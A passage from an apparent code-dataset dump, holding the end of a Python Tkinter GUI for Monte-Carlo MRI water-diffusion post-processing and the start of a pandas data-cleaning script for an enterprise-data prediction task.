[u\"\\u2220 (G\\u20D7, \\u00EA\\u2081)\", \"\\u03B4 (ms)\", \"\\u0394 (ms)\", \"nbVals\"];\n\n 
guiVarPst = [self.grdDirFromZ, self.smallDel, self.bigDel, self.nbVals];\n\n for i in range (len(lbls) - 1):\n self.lblPsP.append(self.guiLabel(self.frm3, lbls[i], row1=row1 + i/3,\n col1=col1 + 1 + 2*(i%3), fontL=self.lableFont,\n fg1=fgclr, bg1=bgclr, wid1=6));\n entTmp, varTmp = self.guiEntry (self.frm3, guiVarPst[i], wid1=7, bd1=2,\n row1=row1 + i//3, col1=col1 + 2 + 2*(i%3),\n fg1=fgclr_entry);\n\n self.entPsP.append (entTmp);\n guiVarPst[i] = varTmp;\n\n # nbVals separately added\n self.lblPsP.append(self.guiLabel(self.frm3, lbls[3], row1=5,\n col1=2, fontL=self.lableFont,\n fg1=fgclr, bg1=bgclr, wid1=7));\n entTmp, varTmp = self.guiEntry (self.frm3, guiVarPst[3], wid1=7, bd1=2,\n row1=5, col1=3, fg1=fgclr_entry);\n\n self.entPsP.append (entTmp);\n guiVarPst[3] = varTmp;\n\n # new additional row\n self.maxG_L = tk.Label (self.frm3, text=\"max G (mT/m)\",\n borderwidth=1, relief=\"groove\",\n fg=fgclr, bg=bgclr, font=self.boldFont);\n self.maxG_L.grid (row=4, column=1, columnspan=2, sticky=\"wesn\");\n\n self.maxG = tk.DoubleVar();\n self.maxG_E = tk.Entry (self.frm3, textvariable=self.maxG, width=7,\n font=self.inputFont,\n state=\"normal\", justify=tk.CENTER, bd=1);\n self.maxG_E.grid (row=4, column=3, sticky=\"ewns\", pady=1);\n self.maxG.set(80); # s/m2\n self.maxG_E.bind (\"\", lambda event: self.updateProtFtn(\"maxG_E\"));\n mgv.maxG = self.maxG.get();\n\n\n # new row: 5\n self.bMx_DelG_DelDelta = tk.StringVar();\n self.bMx_DelG_DelDelta_O = tk.OptionMenu(self.frm3, self.bMx_DelG_DelDelta,\n self.bMaxTxt, self.delGTxt, self.delDeltaTxt);\n self.bMx_DelG_DelDelta_O.config (font=(self.optFnt,self.optFntSz),bg='green',fg='black',width=8);\n self.bMx_DelG_DelDelta_O['menu'].config (font=(self.optFnt,self.optFntSz),bg='yellow',fg='black');\n self.bMx_DelG_DelDelta_O.grid (row=5, column=4, sticky=\"wesn\")\n self.bMx_DelG_DelDelta_O.config (highlightbackground=bgclr);\n self.bMx_DelG_DelDelta.set(self.bMaxTxt);\n self.bMx_DelG_DelDelta_O.bind (\"\",\n lambda 
event: self.updateProtFtn(\"bMx_DelG_DelDelta_O\"));\n\n # increment Delta\n self.DeltaStep = tk.DoubleVar();\n self.DeltaStep_E = tk.Entry(self.frm3, textvariable=self.DeltaStep, width=7,\n font=self.inputFont,\n state=\"normal\", justify=tk.CENTER, bd=1);\n self.DeltaStep_E.grid (row=5, column=5, sticky=\"ewns\", pady=1);\n self.DeltaStep_E.bind (\"\", lambda event: self.updateProtFtn(\"DeltaStep_E\"));\n self.DeltaStep.set(100); # in ms unit, ...\n mgv.DeltaStep = 1e-3*self.DeltaStep.get();\n\n # icrement Gd, ...\n self.GdStep = tk.DoubleVar();\n self.GdStep_E = tk.Entry(self.frm3, textvariable=self.GdStep, width=7,\n font=self.inputFont,\n state=\"normal\", justify=tk.CENTER, bd=1);\n self.GdStep_E.grid (row=5, column=5, sticky=\"ewns\", pady=1);\n self.GdStep.set(10.0); # mT/m unit\n self.GdStep_E.bind (\"\", lambda event: self.updateProtFtn(\"GdStep_E\"));\n mgv.GdStep = self.GdStep.get();\n\n self.bMax = tk.IntVar();\n # self.bMax = tk.DoubleVar();\n self.bMax_E = tk.Entry (self.frm3, textvariable=self.bMax, width=7,\n font=self.inputFont,\n state=\"normal\", justify=tk.CENTER, bd=1);\n self.bMax_E.grid (row=5, column=5, columnspan=2, sticky=\"ewns\", pady=1);\n self.bMax.set(10000); # s/m2\n self.bMax_E.bind (\"\", lambda event: self.updateProtFtn(\"bMax_E\"));\n mgv.bMax = 1e6*self.bMax.get();\n\n # option to select constant delta, Gd, or B (with constant delta)\n self.varyDelGdB = tk.StringVar();\n self.varyDelGdB_O = tk.OptionMenu(self.frm3, self.varyDelGdB,\n self.varyDelTxt, self.varyGdTxt, self.constBTxt);\n self.varyDelGdB_O.config (font=(self.optFnt,self.optFntSz),bg='green',fg='black',width=5);\n self.varyDelGdB_O['menu'].config (font=(self.optFnt,self.optFntSz),bg='yellow',fg='black');\n self.varyDelGdB_O.grid (row=5, column=1, sticky=\"wesn\")\n self.varyDelGdB_O.config (highlightbackground=bgclr);\n self.varyDelGdB.set(self.varyGdTxt);\n\n mgv.varyDelTxt, mgv.varyGdTxt, mgv.constBTxt = self.varyDelTxt, self.varyGdTxt, self.constBTxt;\n\n # A 
column is push out in above for loop\n #self.cBtnPsP_3.append(self.guiChkButton(self.frm3, \" ... \", self.bMpiPySigComp,\n # row1=5, col1=6, fg1=fgClrC, bg1=bgClrC, indOn=0,\n # wid1=7, def1=True, cmd1=postProCal));\n col1 += 1;\n\n guiVarPst += [self.GdStep, self.varyDelGdB, False]; #, self.constantDiffTime];\n\n # self.cBtnPsP_3Val.append ( False );\n\n self.btnPsP_4 = self.guiButton(self.frm3, 'R U N',row1=5, col1=7, wid1=8,\n state1=\"disabled\",\n fontB=\"darkgreen\", # self.buttonFont,\n fg1=self.fgClrB, hlBgClr1=self.hlBgColor,\n cmd1=lambda: mPstP.mcsPostPro(guiVarPst, mgv,\n mPstP.readFiles(False, mgv, self.fInfo)).run(mgv));\n\n # separator, ...\n self.hLine31 = ttk.Separator(self.frm3, orient=\"horizontal\"\n ).grid(row=0, column=1, columnspan=7, pady=1, sticky=\"ewns\")\n\n dialogTxt = \"Select 3 files (initGeometry*.txt, *_mcs.txt, *_mcs.dat)\";\n lblTxt = 'select data: [gm*.dat, gm*_mcs.txt, gm*_mcs.dat]\\n';\n lblTxt += '... (1). geometry, (2). *_mcs.dat, (3). *_mcs.txt ...';\n self.btnPsP = tk.Button(self.frm3, text=lblTxt, fg=self.fgClrB, font=self.buttonFont,\n wid = 8 + 2*(_platform == \"linux\"),\n command=lambda: self.selectDataFiles(dialogTxt));\n self.btnPsP.grid (row=1, column=1, columnspan=7, sticky=\"ewns\");\n self.btnPsP.config (highlightbackground = self.hlBgColor);\n if bShowToolTip:\n ToolTip(self.btnPsP, \"{self.btnPsP} Load input geometry and MCS data/text files.\");\n\n # gradient-waveform table\n self.cBtnPsP.append(self.guiChkButton(self.frm3, \"dsp Geom\", self.initDsp,\n row1=2, col1=1, fg1=fgClrC, bg1=bgClrC, indOn=0,\n def1=True, state1=\"disabled\", cmd1=InItDisplay));\n\n self.cBtnPsP.append(self.guiChkButton (self.frm3, \"calc PostP\", self.postProCal,\n row1=3, col1=1, pady1=2,fg1=fgClrC, bg1=bgClrC,\n indOn=0, state1=\"disabled\",\n cmd1=postProCal));\n\n self.postProCal.set ( True );\n\n self.cBtnPsPVal.append ( self.initDsp );\n self.cBtnPsPVal.append ( self.postProCal );\n\n #\n InItDisplay();\n postProCal ();\n 
self.UP_B.invoke();\n\n self.hLine32 = ttk.Separator(self.frm3, orient=\"horizontal\"\n ).grid(row=6, column=1, columnspan=7, pady=1, sticky=\"ewns\")\n\n def selectDataFiles(self, dialogTxt):\n myMod1 = \"loadFiles\";\n\n txtC = mPstP.colored(\"[{:^10}:L{:0>4}]:Q: \".format(myMod1, getCurrLineNo()),\n \"green\", attrs=[\"bold\"]);\n\n print (txtC + dialogTxt);\n\n geomFileName, hdrFileName, datFileName = None, None, None;\n plt.close(\"all\");\n\n self.fInfo = mPstP.selectDataFiles(dialogTxt);\n\n err = False;\n if None not in self.fInfo:\n mgv.hdrFileName = hdrFileName = os.path.split(self.fInfo[0])[1];\n mgv.datFileName = datFileName = os.path.split(self.fInfo[1])[1];\n mgv.geomFileName = geomFileName = os.path.split(self.fInfo[2])[1];\n\n hdrName = geomFileName.split(\".\")[0];\n if not (hdrName in hdrFileName and hdrName in datFileName):\n err = True;\n txt = (\"Seleched files are are not consistant.\");\n txtC += mPstP.colored(txt, \"red\", attrs=[\"bold\"]);\n\n mgv.tmStr = self.tmStr = time.strftime('%m/%d/%Y', time.gmtime(os.path.getmtime(self.fInfo[0]))).split(\"/\");\n else:\n err = True;\n txt = (\"Selection of MCS file set not complete.\");\n txtC += mPstP.colored(txt, \"red\", attrs=[\"bold\", \"blink\"]);\n print (txtC);\n\n txt += \"\\nSelect correct files.\";\n res = mBox.showinfo(\"File-selection Error\", txt, icon=\"warning\");\n\n # check if , ...\n if None in [mgv.geomFileName, mgv.hdrFileName, mgv.datFileName] or err: return False;\n # else: self.btnPsP_4.config(state=\"normal\");\n\n txtC = mPstP.colored(\"[{:^10}:L{:0>4}]: : \".format(myMod1, getCurrLineNo()),\n \"green\", attrs=[\"bold\"]);\n txt = \"Selected data files = \\n\";\n txt += \" geomDat = %s\\n\" % (geomFileName);\n txt += \" mcsData = %s\\n\" % (datFileName );\n txt += \" mcsText = %s\\n\" % (hdrFileName );\n print (txtC + txt);\n\n # load and display data, ...\n self.loadNDisplayFtn(\"loadFiles\");\n\n success = self.updateProtFtn(\"%s\" % myMod1);\n\n if None in self.fInfo:\n 
err = True;\n txt = (\"No file has been selected.\");\n txtC += mPstP.colored(txt, \"red\", attrs=[\"bold\"]);\n print (txtC);\n\n if err:\n txt += \"\\nSelect correct files.\";\n res = mBox.showinfo(\"fileSelection Error\", txt, icon=\"warning\");\n\n def guiRadioButton (self, frm, txt, var, row1=0, col1=0, fg1=None, bg1=None, cmd1=None):\n rbtn = tk.Radiobutton(frm, text=txt, variable = var, value = 1,\n fg=fg1, bg=bg1, relief=tk.RIDGE);\n rbtn.grid (row=row1, column=col1);\n return rbtn;\n\n def guiButton (self, frm, txt, row1=0, col1=0, rowSpan=1, colSpan=1, wid1=8,\n state1=\"normal\",\n fg1=None, bg1=None, fontB=None, padx1=None, pady1=None,\n hlBgClr1=None, cmd1=None):\n if fontB == None: fontB = \"-weight bold\";\n\n cbtn = tk.Button(frm, text=txt, fg=fg1, bg=bg1, relief=tk.RIDGE,\n padx=padx1, pady=pady1, state=state1,\n command=cmd1, font=fontB, width=wid1);\n cbtn.grid (row=int(row1), column=int(col1), rowspan=rowSpan, columnspan=colSpan, sticky=\"ewns\");\n cbtn.config (highlightbackground = hlBgClr1);\n\n return cbtn;\n\n def guiChkButton(self, frm, txt, var, indOn=0, row1=0, col1=0, rowSpan=1,\n wid1=8, colSpan=1, fg1=None, bg1=None, fontC=None,\n padx1=1, pady1=2, def1=True, cmd1=None, state1=\"normal\"):\n if fontC == None: fontC = \"-weight bold\";\n\n chkBtn = tk.Checkbutton(frm, text=txt, variable=var, indicatoron=indOn,\n padx=padx1, pady=pady1, state=state1,\n fg=fg1, bg=bg1, command=cmd1, relief=tk.RIDGE,\n font=fontC, width=wid1);\n var.set(def1);\n\n chkBtn.grid(row=int(row1), column=int(col1), rowspan=rowSpan, columnspan=colSpan, sticky=\"ewns\");\n\n return chkBtn;\n\n def guiLabel(self, frm, txt, row1=0, col1=0, fg1= None, bg1=None, fontL=None, wid1=8, padx1=2, pady1=0):\n if fontL == None: fontL = \"-weight bold\";\n\n lbl = tk.Label(frm, text=txt, fg=fg1, bg=bg1, padx=4, relief=tk.RIDGE,\n font=fontL, width=wid1);\n lbl.grid (row=int(row1), column=int(col1), sticky=\"ewns\");\n return lbl;\n\n def guiEntry (self, frm, txtVar, row1=0, 
col1=0, fg1=None, bg1=None, font1=None, wid1=5, padx1=1, bd1=2):\n if font1 == None: font1 = self.inputFont;\n\n ent = tk.Entry(frm, textvariable=txtVar, fg=fg1, bg=bg1, bd=bd1, relief=tk.RIDGE,\n font = self.inputFont, justify=tk.CENTER, width=wid1);\n ent.grid(row = int(row1), column=int(col1), sticky=\"ewns\");\n ent.bind (\"\", lambda event: self.updateProtFtn(txtVar));\n\n return ent, txtVar;\n\n def initGUI(self):\n self.master = root;\n\n eachFrm = 'gray48';\n\n self.frmHgt0, self.frmHgt3, self.frmHgt4 = 108, 152, 64;\n\n self.w0Wd = 648;\n self.w0Ht = self.frmHgt0 + self.frmHgt3 + self.frmHgt4 + 13;\n\n self.w0X, self.w0Y = self.master.winfo_screenwidth() - self.w0Wd, 0;\n self.master .geometry(\"%dx%d+%d+%d\" % (self.w0Wd, self.w0Ht, self.w0X, self.w0Y))\n\n titleTxt = ('Monte-Carlo Simulation of Water Diffusion:');\n if _platform not in [\"win32\", \"windows\"]:\n hostName = platform.node();\n loginName = os.getlogin();\n titleTxt += (' {OS: %s, %s@' % (platform.system(), loginName));\n if _platform in [\"darwin\"]:\n titleTxt += ('%s}' % hostName[:hostName.index(\".\")]);\n elif _platform in [\"linux\"]: titleTxt += ('%s}' % hostName);\n\n self.master.title( titleTxt);\n\n # root.title(\"Monte-Carlo Simulation of water diffusion\") # Set the window title\n self.master.minsize(width=self.w0Wd, height=self.w0Ht);\n self.master.maxsize(width=self.w0Wd, height=self.w0Ht);\n self.master.resizable(width=False, height=False);\n\n # tk.Frame 0 is for creating a geometry\n self.frm0 = tk.Frame(self.master, width=self.w0Wd-6, height=self.frmHgt0,\n bg=eachFrm, relief=tk.RIDGE);\n self.frm0.grid(row=0, column=0, padx=3, pady=2);\n self.frm0.grid_propagate(False);\n\n #tk.Frame 3 is for doing a postprocessing\n self.frm3 = tk.Frame(self.master, width=self.w0Wd-6, height=self.frmHgt3,\n bg=eachFrm, relief=tk.RIDGE);\n self.frm3.grid(row=1, column=0, padx=3, pady=2);\n self.frm3.grid_propagate(False);\n\n #tk.Frame 4 is for doing a postprocessing\n self.frm4 = 
tk.Frame(self.master, width=self.w0Wd-6, height=self.frmHgt4,\n bg=eachFrm, relief=tk.RIDGE);\n self.frm4.grid(row=2, column=0, padx=3, pady=2);\n self.frm4.grid_propagate(False);\n\n self.master.configure(bg=\"darkred\"); # set the window background color\n\n def closeFigFtn (self):\n plt.close(\"all\");\n\n def enterPdbFtn (self):\n txtC = mPstP.colored(\"Entered debugging mode. h/help, c/continue, q/quit.\", \"red\", attrs=[\"bold\"]);\n print (txtC);\n pdb.set_trace();\n\n def loadNDisplayFtn (self, txtIn):\n myMod1 = \"loadNDisplayFtn\";\n\n mPstP.loadNDisplay(mgv, [self.bMkDiffMovie, self.openHdrTxt],\n mPstP.readFiles(False, mgv, self.fInfo));\n\n if self.mcsPstPro.get():\n mgv.bMcsDataLoaded = self.bMcsDataLoaded = True;\n else: mgv.bMcsDataLoaded = self.bMcsDataLoaded = False;\n\n # set these values and display on MCS window, ..\n cPrint(\"[{:^10}:L{:0>4}]: : mcs data successfully loaded:\".format(myMod1, getCurrLineNo()),\n \"green\", attrs=[\"bold\"]);\n\n def nullFtn (self, txtIn):\n myMod1 = \"Null Button\";\n\n txtC = mPstP.colored(\"[{:^10}:L{:0>4}]: : \".format(myMod1, getCurrLineNo()), \"green\", attrs=[\"bold\"]);\n print (txtC + \" %s NOT USED. 
\" % txtIn);\n\n def updateProtFtn (self, txtIn):\n myMod1 = \"updateProt\"\n\n txtC = mPstP.colored(\"[{:^10}:L{:0>4}]: : \".format(myMod1, getCurrLineNo()),\n \"green\", attrs=[\"bold\"]);\n print (txtC + \"update-protocol invoked by {%s}.\" % txtIn);\n\n if self.bMcsDataLoaded:\n if 2*self.smallDel.get() > mgv.dtDiff:\n self.smallDel.set(mgv.dtDiff/2);\n\n diffTime = (self.smallDel.get() + self.bigDel.get());\n if mgv.dtDiff < diffTime:\n txt = (\"%.1f < (%.1f + %.1f)\" % (mgv.dtDiff, self.smallDel.get(), self.bigDel.get()));\n txt += (\"\\n\\t--> Reduce gradient duration and separation.\");\n print (txtC + txt);\n\n self.bigDel.set(mgv.dtDiff - self.smallDel.get());\n\n self.mcsPstPro.set ( True );\n self.initDsp.set ( True );\n self.postProCal.set( True );\n\n # update checkButton fg and bg colors, ...\n self.cBtnPsPVal [0] = self.initDsp;\n self.cBtnPsPVal [1] = self.postProCal;\n # self.cBtnPsPVal [2] = False;\n\n if self.nbVals.get() < 2: self.nbVals.set(2);\n\n if None in [mgv.geomFileName, mgv.hdrFileName, mgv.datFileName]:\n self.btnPsP_4.config(state=\"disabled\");\n else: self.btnPsP_4.config(state=\"normal\");\n\n if self.postProCal.get():\n self.cBtnPsP_2Val[0] = self.bMkDiffMovie;\n self.cBtnPsP_2Val[1] = self.openHdrTxt;\n\n if self.bMax.get() <= 0.0: self.bMax.set (1);\n\n if self.bMx_DelG_DelDelta.get() == self.bMaxTxt:\n self.GdStep_E.grid_remove ();\n self.DeltaStep_E.grid_remove();\n self.bMax_E.grid ();\n elif self.bMx_DelG_DelDelta.get() == self.delGTxt:\n self.bMax_E.grid_remove ();\n self.DeltaStep_E.grid_remove();\n self.GdStep_E.grid ();\n elif self.bMx_DelG_DelDelta.get() == self.delDeltaTxt:\n self.GdStep_E.grid_remove();\n self.bMax_E.grid_remove ();\n self.DeltaStep_E.grid ();\n\n GPS.config(text=gpsLblTxt + \"\\nD W I\");\n\n # otherwise, error is raised in mPstP.sigCalc\n if self.bMax.get() == 0: self.bMax.set(10);\n\n mgv.bMax = 1e6*self.bMax.get();\n mgv.GdStep = self.GdStep.get();\n mgv.DeltaStep = 1e-3*self.DeltaStep.get();\n 
self.delGTxt = \"\\u0394G (mT/m)\" if self.constantDiffTime.get() else \"G\\u20D7 (mT/m)\";\n\n self.bMx_DelG_DelDelta_O['menu'].delete(0, 'end'); # First, delete all list, ...\n for choice in tuple((self.bMaxTxt, self.delGTxt, self.delDeltaTxt)):\n self.bMx_DelG_DelDelta_O['menu'].add_command(label=choice,\n command=tk._setit(self.bMx_DelG_DelDelta, choice));\n\n if self.bMcsDataLoaded and mgv.dGWaveTbl is not None:\n if (mgv.dGWaveTbl[:,0] + mgv.dGWaveTbl[:,1]).max() > 1e-3 * mgv.dtDiff:\n mgv.dGWaveTbl = None;\n self.bGWaveTblRead = False;\n\n txtC = mPstP.colored(\"[{:^10}:L{:0>4}]: : \".format(myMod1, getCurrLineNo()), \"green\", attrs=[\"bold\",\"blink\"]);\n txtC2 = mPstP.colored(\"The G-Table %s is unloaded.\" % mgv.gWaveFileName, \"red\", attrs=[\"bold\",\"blink\"]);\n print (txtC + txtC2 + \" Check the times.\");\n else:\n self.varyDelGdB.set( self.varyGdTxt );\n\n self.bigDel.set (1e3 * (mgv.dGWaveTbl[:,0].max() - mgv.dGWaveTbl[:,0].min()));\n self.smallDel.set(1e3 * (mgv.dGWaveTbl[:,1].max() ));\n\n # print out the maximum bVal, ..\n if self.mcsPstPro.get():\n mgv.Deltas = np.zeros( self.nbVals.get() + 1);\n mgv.nbVals = self.nbVals.get() + 1;\n\n dGradNB = [];\n mgv.smallDelta = 1e-3*self.smallDel.get();\n\n delta, Delta = 1e-3*self.smallDel.get(), 1e-3*self.bigDel.get();\n dirAng = self.grdDirFromZ.get()/57.299;\n\n if self.varyDelGdB.get() in [self.constBTxt, self.varyDelTxt]:\n self.entPsP[2].config (state=\"disabled\");\n\n maxDelStep = (mgv.dtDiff - 2*self.smallDel.get())/self.nbVals.get();\n\n if self.DeltaStep.get() > maxDelStep: self.DeltaStep.set( maxDelStep );\n\n mgv.Deltas[:] = 1e-3*self.DeltaStep.get()*np.arange(self.nbVals.get() + 1);\n\n # otherwise bVal becomes negative, ...\n mgv.Deltas[0] = 1e-3*self.smallDel.get();\n else: # b-value varies, with constant delta and Delta: self.varyGdTxt\n self.entPsP[2].config (state=\"normal\" );\n mgv.Deltas[:] = 1e-3*self.bigDel.get();\n\n # ....\n for k in range(self.nbVals.get() + 1):\n bValFct = 
0.0;\n\n if self.varyDelGdB.get() == self.constBTxt: bValFct = 1.0;\n elif self.varyDelGdB.get() == self.varyGdTxt: bValFct = (k/self.nbVals.get())**2;\n else: bValFct = (mgv.Deltas[ k] - 1e-3*self.smallDel.get()/3) \\\n /(mgv.Deltas[-1] - 1e-3*self.smallDel.get()/3);\n\n if k==0: bValFct = 0.000001; # otherwise, error in mPstP, line 801\n\n dGradNB.append ((np.sin(dirAng), 0.0, np.cos(dirAng), bValFct));\n\n mgv.dGradNB = self.dGradNB = np.array(dGradNB).T;\n mgv.dGradNBL = self.dGradNBL = [(\"dir0\", self.dGradNB)];\n\n if self.varyDelGdB.get() != self.varyGdTxt:\n self.bigDel.set ( 1e3*mgv.Deltas[-1] ); # show the largest Delta\n # self.bigDel.set ( self.DeltaStep.get() );\n\n if len(self.dGradNBL) == 0 and self.dGradNB is not None:\n mgv.dGradNBL = self.dGradNBL = [(\"dir0\", self.dGradNB)];\n\n if len(self.dGradNBL) > 0:\n if self.dGradNBL[0][1].shape[1] != (self.nbVals.get() + 1): # for DTI simulation,\n mgv.dGradNBL = self.dGradNBL = [(\"dir0\", self.dGradNB)];\n\n # calc maximum B\n mgv.maxG = self.maxG.get();\n maxB = 1e-12*(mgv.gammaRad*mgv.smallDelta*self.maxG.get())**2 * 1e-3*(self.bigDel.get() - 1e-3*self.smallDel.get()/3);\n self.bMax.set(np.round(min(self.bMax.get(), maxB), 0));\n\n self.lblPsP[0].config(state=\"normal\" );\n self.entPsP[0].config(state=\"normal\" );\n\n # simulate for constant B with varying diffTime, ...\n if self.bMcsDataLoaded: # and self.bDGradDirRead:\n mgv.bMax = 1e6*self.bMax.get();\n delta, Delta = 1e-3*self.smallDel.get(), 1e-3*self.bigDel.get();\n if self.varyDelGdB.get() in [self.varyGdTxt, self.constBTxt]:\n GdStep = 1e3*np.sqrt(mgv.bMax/(Delta - delta/3)) \\\n /(self.gamma*delta*self.nbVals.get());\n elif self.varyDelGdB.get() == self.varyDelTxt:\n GdStep = 1e3*np.sqrt(mgv.bMax/(mgv.Deltas[-1] - delta/3))/(self.gamma*delta);\n\n self.GdStep.set ( np.around(GdStep, decimals=4) );\n\n txtC = mPstP.colored(\"[{:^10}:L{:0>4}]: : \".format(myMod1, getCurrLineNo()), \"green\", attrs=[\"bold\"]);\n txt = \"maximum bVal = %.1f 
%s\" % (self.bMax.get(), self.bUnit);\n\n print (txtC + txt);\n\n\n mgv.colorMap4Dsp = eval(\"cm.\" + self.colorMap4Dsp.get());\n mgv.plsSeqType = self.plsSeqType.get();\n if mgv.plsSeqType == \"StimEcho\": self.TE_ms.set(2*self.smallDel.get() + 5.12);\n else: self.TE_ms.set(self.smallDel.get() + self.bigDel.get() + 5.12);\n\n mgv.TE_ms = self.TE_ms.get();\n\n self.bigDel.set(np.round(max(self.bigDel.get(), self.smallDel.get() + 5.12), 2));\n\n if self.mcsPstPro.get(): self.t2Vals_E.config(state= \"normal\" );\n else: self.t2Vals_E.config(state=\"disabled\");\n\n t2ValsStr = self.t2Vals.get().replace(\",\",\".\").replace(\" \",\".\")\n self.t2Vals.set(t2ValsStr);\n mgv.icsT2, mgv.mlsT2, mgv.ecsT2 = np.array(self.t2Vals.get().split(\".\")[0:3], dtype=np.double);\n\n # END of updateProtFtn\n\n# pop up a help message box, ..\ndef getHelp (*args):\n global bYesNo;\n\n def popUpMessage (titleTxt, messageTxt):\n # popUpWin = tk.Tk(); # to change the display font, but not working, ...\n # popUpWin.option_add('*Dialog.msg.width', 50); # window wider\n # popUpWin.option_add('*font', self.inputFont);\n res = mBox.showinfo(titleTxt, messageTxt, icon=\"warning\");\n # popUpWin.option_clear();\n return res;\n\n argc = len(args);\n titleTxt, msgTxt = args[0:2];\n defAns = args[argc - 1];\n\n if argc > 2:\n bYesNo = mBox.askyesno(titleTxt, msgTxt, default=defAns, icon=\"question\");\n if bYesNo: popUpMessage(\"HELP\", args[2]);\n else: bYesNo = mBox.showinfo(titleTxt, msgTxt);\n\n return bYesNo;\n\ndef main_MCS():\n global GPS, gpsLblTxt;\n\n GUI = GUI_MCS();\n\n fgClr, bgClr = 'white', 'darkgreen';\n fgClrB, bgClrB = 'navy', 'black';\n hlBgColor = \"green\"\n\n if sys.version_info < (3, 6):\n procFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=15);\n titleFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=14);\n cmdFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=16);\n infoFontB = tkFont.Font(family=\"Helvetica\", weight='bold', size=12);\n 
infoFont = tkFont.Font(family=\"Helvetica\", size=12);\n else:\n if _platform in [\"win32\", \"windows\"]:\n procFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=11);\n titleFont = tkFont.Font(family=\"Helvetica\", weight='bold', size= 9);\n infoFont = tkFont.Font(family=\"Helvetica\", size=11);\n elif _platform in [\"linux\"]:\n procFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=11);\n titleFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=10);\n infoFont = tkFont.Font(family=\"Helvetica\", size=12);\n else:\n procFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=12);\n titleFont = tkFont.Font(family=\"Helvetica\", weight='bold', size= 9);\n infoFont = tkFont.Font(family=\"Helvetica\", size=12);\n\n cmdFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=11);\n infoFontB = tkFont.Font(family=\"Helvetica\", weight='bold', size= 8);\n\n GI = GUI.gui_makeInfoFrame ();\n\n wid1 = 9 if (_platform in [\"win32\", \"windows\", \"linux\"]) else 12;\n wid11 = wid1 if _platform not in [\"win32\", \"windows\"] else 6;\n GPS = tk.Label (GUI.frm3, text=\"MCS pstProc\", font=procFont,\n bg='black', fg='white', padx=4, pady=2,\n width=11, justify=tk.CENTER, relief=tk.RIDGE);\n GPS.grid (row=0, column=0, rowspan=6, sticky=\"ewns\");\n GPS.bind(\"\",\n lambda event: getHelp(\"Yes for further HELP\", hlp.mPstP, \"no\"));\n\n GUI.gui_mcsPstPro();\n\n # extra label to show information\n extra_L = tk.Label (GUI.frm4, text=\"N O T E\", font=procFont, # infoFontB,\n fg='white', bg='gray20', padx=4, pady=2,\n width=11 - 4*(_platform in [\"linux\"]),\n justify=tk.CENTER, relief=tk.RIDGE);\n extra_L.grid (row=0, rowspan=2, column=0, sticky=\"ewns\");\n\n extra1_L = tk.Label(GUI.frm4, text=hlp.hlpEX01, font=infoFont,\n fg='black', bg='gray68', padx=4, pady=2, width=38,\n justify=tk.LEFT, anchor=\"w\", relief=tk.RIDGE);\n extra1_L.grid (row=0, rowspan=2, column=1, columnspan=4, sticky=\"ewns\");\n\n extra2_L = tk.Label(GUI.frm4, 
text=hlp.hlpEX02, font=infoFont,\n fg='black', bg='gray68', padx=4, pady=2, width=38,\n justify=tk.LEFT, anchor=\"w\", relief=tk.RIDGE);\n extra2_L.grid (row=0, rowspan=2, column=5, columnspan=4, sticky=\"ewns\");\n\n root.mainloop();\n\n root.destroy ();\n\n return GUI;\n\n# Following lines are excuted, ...\nif __name__ == '__main__':\n hlp = HELP.helpTxt();\n mgv = MGV.mcsVars ();\n\n GUI = main_MCS();\n\n","sub_path":"mcsGUI.py","file_name":"mcsGUI.py","file_ext":"py","file_size_in_byte":46201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"42820464","text":"import gc\nimport re\nimport sys\nimport time\nimport jieba\nimport string\nimport codecs\nimport pickle\nimport hashlib\nimport os.path\nimport datetime\nimport numpy as np\nimport pandas as pd\nimport lightgbm as lgb\nfrom collections import Counter\nfrom sklearn.metrics import f1_score\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import roc_auc_score\n\n\n\n\n\n######################################## 清洗数据 ########################################\nimport numpy as np\nimport pandas as pd\n\n\n\ndata_path = r'C:/Users/csw/Desktop/python/liangzi/data/'\n\n\nentbase = pd.read_csv(data_path + '1entbase.csv')\nalter = pd.read_csv(data_path + '2alter.csv')\nbranch = pd.read_csv(data_path + '3branch.csv')\ninvest = pd.read_csv(data_path + '4invest.csv')\nright = pd.read_csv(data_path + '5right.csv')\nproject = pd.read_csv(data_path + '6project.csv')\nlawsuit = pd.read_csv(data_path + '7lawsuit.csv')\nbreakfaith = pd.read_csv(data_path + '8breakfaith.csv')\nrecruit = pd.read_csv(data_path + '9recruit.csv')\nqualification = pd.read_csv(data_path + '10qualification.csv',encoding='GB2312')\ntest = pd.read_csv(data_path + 'evaluation_public.csv')\ntrain = pd.read_csv(data_path + 'train.csv')\n\nprint('将feature name转换为小写')\ndef conver2lower(data):\n new_columns = []\n for name in data.columns:\n new_columns.append(name.lower())\n data.columns = 
new_columns\n data.rename(columns={'eid': 'id'}, inplace=True)\n return data\n\nentbase = conver2lower(entbase)\nalter = conver2lower(alter)\nbranch = conver2lower(branch)\ninvest = conver2lower(invest)\nright = conver2lower(right)\nproject = conver2lower(project)\nlawsuit = conver2lower(lawsuit)\nbreakfaith = conver2lower(breakfaith)\nrecruit = conver2lower(recruit)\nqualification = conver2lower(qualification)\ntest = conver2lower(test)\ntrain = conver2lower(train)\n\ndef replace(s):\n if s is np.nan:\n return s\n if '美元' in s:\n return float(s.replace('美元', '').replace('万元', '').replace('万', '')) * 6.5\n if '港' in s:\n return float(s.replace('港', '').replace('币', '').replace('万元', '').replace('万', '')) * 0.85\n\n return float(s.replace('万元','').replace('人民币','').replace('万', '').replace('(单位:)', ''))\ndef get_area(s):\n if '美元' in s:\n return 2\n if '港币' in s:\n return 1\n return 0\n\nprint('数据清洗...')\nalter['altbe'] = alter['altbe'].apply(replace)\nalter['altaf'] = alter['altaf'].apply(replace)\nalter['alterno'].replace('A_015','15',inplace=True)\nqualification['begindate'] = qualification['begindate'].apply(lambda x: x.replace('年','-').replace('月',''))\nqualification['expirydate'] = qualification['expirydate'].apply(lambda x: x.replace('年','-').replace('月','') if type(x) is str else x)\nbreakfaith['fbdate'] = breakfaith['fbdate'].apply(lambda x: x.replace('年','-').replace('月',''))\nbreakfaith['sxenddate'] = 